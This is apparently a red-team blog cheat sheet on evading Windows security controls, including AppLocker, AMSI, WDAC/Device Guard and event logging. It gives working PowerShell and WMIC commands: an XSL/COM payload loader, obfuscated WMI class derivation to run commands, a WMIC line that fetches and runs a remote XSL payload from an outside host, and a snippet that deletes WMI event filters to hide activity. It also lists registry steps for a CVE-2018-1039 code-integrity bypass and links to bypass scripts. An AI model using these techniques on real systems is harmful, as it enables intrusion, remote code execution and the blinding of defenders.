Defenses Evasion (The Quick'n Dirty) This is just a quick and dirty overview of some defense evasion tactics that are out there for some the common services / processes. I might post something in the future that dives into this deeper - if you don't want to wait for that day to come I'm sharing with you below some amazing resources and articles I've appreciated in the past. Awesome tool for restricted env. evasion: https://github.com/Cn33liz/p0wnedLoaderhttps://rastamouse.me/2018/05/csharp-dotnettojscript-xsl/https://github.com/Arno0x/PowerShellScriptshttps://github.com/cobbr/PSAmsi/wiki/Introduction-To-PSAmsihttps://github.com/secabstraction/WmiSploit More: https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/ https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html https://oddvar.moe/https://www.fortynorthsecurity.com/building-a-windows-defender-application-control-lab/https://posts.specterops.io/threat-detection-using-windows-defender-application-control-device-guard-in-audit-mode-602b48cd1c11https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/evaluate-windows-defender-exploit-guardhttp://www.exploit-monday.com/2018/06/device-guard-and-application.htmlhttps://lolbas-project.github.io/#https://www.contextis.com/en/blog/amsi-bypass Application Identify Service (Process name: AppIDSvc) Definition: The Application Identity service determines and verifies the identity of an app. Stopping this service will prevent AppLocker policies from being enforced. Important: When using Group Policy, you must configure it to start automatically in at least one Group Policy Object (GPO) that applies AppLocker rules. This is because AppLocker uses this service to verify the attributes of a file. Identification:Get-Service appidsvc Bypass through COM object technique: 1) Store payload in XML file: 2) Use "COM" object to execute payload: $xsl = new-object -ComObject Msxml2.DoMDocument.6.0 $xsl.load("C:\Users\Victim\Documents\minimalist.xml") | out-null $xsl.setProperty("AllowXsltScript",$true) $xsl.transformNode($xsl) Evade Detection and/or Restricted Environments WMI Class Derivation (Evasion) with no "win32" prefix: $C = [WmiClass] '/root/cimv2:Win32_Process' $N = $C.derive('MyEvilProcess') $N.Put() Invoke-WmiMethod MyEvilProcess -Name CrEaTe -ArgumentList calc.exe Advanced WMI Class Derivation - presented at Security BsidesDublin 2019 talk.Full details https://github.com/kmkz/PowerShell/tree/master/BsidesDublin-2019 # RandomName function: function GenerateRandomName(){ $Pf = "abcdefghijkmnopqrstuvwxyzABCEFGHJKLMNPQRSTUVWXYZ23456789".TOchArarRay() $rSVdssS1="" 1..10 | ForEach { $rSVdssS1 += $Pf | Get-Random } return $rSVdssS1 } # Class derivation zNrF = -jOin[regex]::MaTcHeS('sSeCorp_23nIw:2VmIc/tOoR/',".",'RightToLeft') $CoFtfEgvsJ = [wMicLaSs]$zNrF $YepTa = "pRoc"+"eSs" $PoDtbeF4Dp= GenerateRandomName $N = $CoFtfEgvsJ.dEriVe("$PoDtbeF4Dp") $N.pUt() $BlzQ=0 $VrBnZ=111-1+3+7+5+5-3+$BlzQ $CpOnBt5= gEt-cOntEnt -paTh "\\Vboxsvr\shared\BSIDESIE\cmd.in.txt" # your command # Payload execution: iNvokE-wmIMeThOd $PoDtbeF4Dp -NaMe CrEaTe -arGumEntlIst "cMd ^/c $CpOnBt5 >>\\Vboxsvr\shared\BSIDESIE\$rSVdssS.lol" # collect output (if needed) Authenticated proxy bypass:"Creates a TCP Tunnel through the default system proxy. As such, it automatically handles proxy authentication if ever required."https://github.com/Arno0x/PowerShellScripts/blob/master/proxyTunnel.ps1 PowerShell without PowerShell + restricted env. escaping through WMIC XSL payload execution: C:\Windows\System32\WMIC.exe os get /format:"https://tatamaster.lol/p0wnedLoader/p0wnedLoader.xsl" Blue team/detection mechanisms evasion for WMI lateral movements:(Add following line to your payload to remove Windows "Applications" EvenViewer logs) Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_PersistenceEvent_'"| Remove-WmiObject Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_ProcessCreationEvent_'"| Remove-WmiObject Antimalware Scan Interface (AMSI) Identification (for ScanBuffer): In a PowerShell terminal, enter “AmsiScanBuffer” (with double quotes)Bypasses:https://github.com/kmkz/PowerShell/blob/master/amsi-bypass.ps1 Resources:https://www.contextis.com/en/blog/amsi-bypass https://rastamouse.me/2018/12/amsiscanbuffer-bypass-part-4/ (most recent techniques) https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html AppLocker demystification "When whitelisting policies are enforced, PowerShell CLM is applied in AppLocker (for users in "Allowed Mode") and WDAC (for users and administrators)." Error message: "This app has been blocked by your system Administrator" Bypass:1) use p0wnedShell via .xsl file + encryption (for Defender Bypass) https://github.com/Cn33liz/p0wnedLoader for payload delivery (WMI)Example: C:\Windows\System32\wbem\WMIC.exe os get /format:"https://tatamaster/p0wnedLoader.xsl"2) https://github.com/kmkz/PowerShell/blob/master/Semi-interactive-shell-applocker-bypass.ps1 Resources: P0wnedShell by Cn33liz: https://github.com/Cn33liz/p0wnedShellAAronLocker: https://blogs.msdn.microsoft.com/aaron_margosis/2018/06/26/announcing-application-whitelisting-with-aaronlocker/https://www.slideshare.net/OddvarHlandMoe/appolockalypse-nowhttps://github.com/api0cradle/UltimateAppLockerByPassList Windows Lockdown Policy (WLDP aka Device Guard) with User Mode Code Integrity (UMCI) policy Definition:When "enforced" by AppLocker policy, CLM COM object instantiation is very open. In essence, (m)any COM object can be instantiated by default when WLDP is not active.Under WDAC with UMCI, the WLDP greatly reduces this number (between 8 to 50 COM objects according to James Forshaw of Google Project Zero in this .NET COM Instantiation UMCI bypass disclosure write-up linked in "Resources" part).Bypass based on CVE-2018-1039 by Google Project Zero: 1) Create a "keys.txt" file with following content: HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A} = REG_SZ WScript.Shell HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\TreatAs = REG_SZ {72C24DD5-D70A-438B-8A42-98424B88AFB8} HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4} HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} 2) From the explorer Run dialog execute “regini path\to\keys.txt” 3) Create a "shell.html" file with following content (our payload): NO OBJECT 4) Execute the HTML file from the Run dialog using "hh.exe path\to\shell.html" Resources:https://bugs.chromium.org/p/project-zero/issues/detail?id=1514 (fixed on 5/08/2018)https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1039